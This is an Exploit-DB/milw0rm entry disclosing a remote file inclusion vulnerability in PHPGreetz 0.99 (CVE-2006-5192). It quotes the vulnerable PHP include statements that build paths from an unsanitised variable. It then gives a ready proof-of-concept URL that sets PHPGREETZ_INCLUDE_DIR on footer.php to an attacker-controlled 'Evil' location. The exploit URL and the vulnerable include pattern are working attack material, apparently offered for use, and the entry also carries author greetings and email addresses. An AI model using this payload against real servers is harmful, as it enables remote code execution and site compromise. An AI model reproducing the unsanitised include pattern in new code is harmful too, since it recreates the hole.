PHPGreetz 0.99 - 'footer.php' Remote File Inclusion

Author: mozi
type: webapps
platform: php
port: 
date_added: 2006-10-03  
date_updated: 2016-09-12  
verified: 1  
codes: OSVDB-33658;CVE-2006-5192  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comphpgreetz-v0.99.tar.gz  

raw file: 2476.txt  
# Author: mozi2weed@yahoo.com mozi
# phpGreetz Remote File Inclusion Vulnerability
# Greetz: Raver #phpfreaks eu.undernet.org
# Greetz: SpiderZ , fUSiON
----------------------------------------------------------------
Download: http://sourceforge.net/project/showfiles.php?group_id=6127
------------------------------------------------------------------
<? include("$PHPGREETZ_INCLUDE_DIR/language/langlist.php"); ?>
("phpgreetz-global.inc.php");
("$PHPGREETZ_INCLUDE_DIR/language/lang.$session_lang.inc.php");
<td colspan="2" valign="top" align="left"><? include($site_location . "/includes/navigation.php"); ?>
$PHPGREETZ_INCLUDE_DIR = "$site_location/includes";
_________________________________________________________________
http://site.com/[path]/includes/footer.php?PHPGREETZ_INCLUDE_DIR=Evil
.
### eu.undernet.org #phpfreaks team
RaVeR -- nutzulake@yahoo.com
mozi -- mozi2weed@yahoo.com mozilla0@hotmail.com

#phpfreaks again
# heh tnx

# milw0rm.com [2006-10-04]